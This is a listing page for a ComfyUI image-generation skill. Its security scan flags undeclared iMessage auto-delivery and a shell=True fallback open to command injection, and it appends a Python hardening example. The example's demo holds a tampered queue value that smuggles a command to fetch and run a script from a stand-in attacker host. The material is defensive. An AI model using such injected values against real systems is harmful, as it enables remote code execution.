Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
ComfyUI Bridge
v0.1.0
Generate images, faceswap, edit photos, animate expressions, and do style transfer via a self-hosted ComfyUI instance on your LAN. Your GPU, your models.
⭐ 0 · 207 · 1 current · 1 all-time
by Andrew Barnes (@bortlesboat)
MIT-0
Security Scan
OpenClaw
Suspicious (high confidence)
Purpose & Capability
The skill's main purpose (drive a local ComfyUI bridge) matches the code. However, the queue processor includes iMessage delivery (imsg CLI) and macOS-specific conversion via sips; neither imsg nor sips are declared in required binaries or install metadata. Automatic messaging/delivery is not an obvious part of 'image generation' in the skill metadata and could surprise users.
Instruction Scope
SKILL.md instructs the agent to run the provided scripts and write media under ~/.openclaw, which is expected. But the included queue_processor.py will automatically send queued outputs via the imsg CLI to a default chat ID unless configured otherwise. Neither SKILL.md nor the metadata prominently warns that queued jobs may be posted to iMessage, and the processor constructs a shell fallback command (shell=True) for imsg, which increases command-injection risk if queue fields are tampered with.
Install Mechanism
Install metadata only requests a brew formula for 'uv', which is sensible for running the scripts. There are no remote downloads or extracted archives. However, additional runtime dependencies (imsg CLI, optional Ollama, Homebrew path assumptions) are required but not declared as install-time requirements.
Credentials
The skill does not request secrets, which is good, but it expects a COMFYUI_BRIDGE_URL env var (documented in SKILL.md but not listed as required). More importantly, the queue processor interacts with the user's iMessage system (via imsg) and will indirectly read from and write to the user's local message DB. This is a sensitive capability that is not represented in the declared env/permission model. The default chat target ("7") and automatic delivery are surprising and could serve as an exfiltration channel.
Persistence & Privilege
The skill does not set always:true and does not modify other skills. It creates and uses local directories under ~/.openclaw for queued requests and media (normal for this purpose). The queue_processor can be run as a daemon, which would give it continuing background activity — acceptable for a queue processor but the combination of background processing + automatic iMessage delivery raises the blast radius.
What to consider before installing
This skill appears to implement a legitimate local bridge to your ComfyUI instance, but review the included queue processor before installing or running it: by default it delivers queued outputs via the imsg CLI (iMessage), using a hard-coded imsg path (/opt/homebrew/bin/imsg) and a default chat ID. If you do not want automatic delivery, do not run queue_processor.py as a daemon, and inspect the queued JSON files in ~/.openclaw/faceswap-queue before processing them. Install the imsg binary and the Homebrew tools it relies on only if you intend to use message delivery. Be cautious about the processor's shell fallback (it runs a shell command if the direct imsg invocation fails): if an attacker can modify files in the queue directory, that fallback turns tampered fields into command injection. Finally, set COMFYUI_BRIDGE_URL explicitly and run the bridge only against trusted LAN hosts. For lower risk, use comfyui_generate.py interactively and handle delivery yourself rather than relying on the automatic queue processor.
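The shell-fallback risk described in the Instruction Scope finding and in the advice above can be made concrete. The following is an added example, not code from this skill or its author: it contrasts the risky pattern (queue fields interpolated into one shell string) with a hardened delivery step that validates each queued entry and invokes imsg with an argv list and no shell. It assumes a queue entry is a JSON object with `chat_id` and `file` keys (a hypothetical schema; the skill's real format is not shown on this page) and that imsg is invoked as `imsg send --chat <id> --file <path>` (assumed flags; check `imsg --help` before adapting this).

```python
"""Added example (not the skill's own code): hardening the imsg delivery step.

Assumptions, not facts from the listing:
  - queue entries are JSON objects with "chat_id" and "file" (hypothetical schema)
  - imsg is called as `imsg send --chat <id> --file <path>` (assumed flags)
"""
import json
import shlex
import subprocess
from pathlib import Path
from typing import List, Optional

IMSG = "/opt/homebrew/bin/imsg"          # hard-coded path named in the scan
DEFAULT_CHAT = "7"                        # default chat ID named in the scan
QUEUE_DIR = Path("~/.openclaw/faceswap-queue").expanduser()
ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif", ".mp4"}


def vulnerable_command(entry: dict) -> str:
    """The pattern to avoid: queue fields interpolated into one shell string.
    Executed with shell=True, any metacharacter in the JSON becomes shell syntax."""
    chat = entry.get("chat_id", DEFAULT_CHAT)
    return f"{IMSG} send --chat {chat} --file {entry['file']}"


def shell_tokens(entry: dict) -> List[str]:
    """Show how a shell would tokenize the vulnerable string (nothing is executed)."""
    return shlex.split(vulnerable_command(entry))


def rejection_reason(entry: dict, queue_dir: Path = QUEUE_DIR) -> Optional[str]:
    """Return why an entry must not be delivered, or None if it is acceptable."""
    chat = str(entry.get("chat_id", DEFAULT_CHAT))
    if not chat.isdigit():
        return f"chat_id is not numeric: {chat!r}"
    raw = entry.get("file")
    if not isinstance(raw, str) or not raw:
        return "missing file field"
    target = Path(raw)
    if not target.is_absolute():
        target = queue_dir / target
    resolved = target.resolve()           # collapses ../ and symlinks
    try:
        resolved.relative_to(queue_dir.resolve())
    except ValueError:
        return f"file escapes the queue directory: {raw!r}"
    if resolved.suffix.lower() not in ALLOWED_SUFFIXES:
        return f"unexpected file type: {resolved.suffix!r}"
    return None


def safe_argv(entry: dict, queue_dir: Path = QUEUE_DIR) -> List[str]:
    """Build an argv list (no shell) after validation; raises on tampered fields."""
    reason = rejection_reason(entry, queue_dir)
    if reason:
        raise ValueError(reason)
    chat = str(entry.get("chat_id", DEFAULT_CHAT))
    target = Path(entry["file"])
    if not target.is_absolute():
        target = queue_dir / target
    return [IMSG, "send", "--chat", chat, "--file", str(target.resolve())]


def deliver(entry_path: Path, queue_dir: Path = QUEUE_DIR, dry_run: bool = True) -> List[str]:
    """Process one queued JSON file. With dry_run the argv is returned, not executed."""
    entry = json.loads(entry_path.read_text())
    argv = safe_argv(entry, queue_dir)
    if not dry_run:
        subprocess.run(argv, check=True)  # argv list: no shell, and no shell fallback
    return argv


if __name__ == "__main__":
    # Constructed sample entries: one benign, one with a tampered chat_id.
    benign = {"chat_id": "7", "file": "result.png"}
    tampered = {"chat_id": "7; curl http://attacker.example/x | sh", "file": "result.png"}
    print("shell would see:", shell_tokens(tampered))
    print("rejected:", rejection_reason(tampered))
    print("argv:", safe_argv(benign))
```

The two defensive choices are independent: the argv list stops the shell from ever parsing queue fields, and the whitelist on `chat_id` and the containment check on `file` stop a tampered entry from reaching imsg at all, even if it could not inject. Dropping the fallback entirely (let a failed imsg call surface as an error) is what removes the risk the scan flagged.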
latest: vk977c8bkvwcgzbqe6etg4csqh182zw62
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
Runtime requirements
🎨 Clawdis
Bins: uv
Install
Install uv (brew)
Bins: uv
brew install uv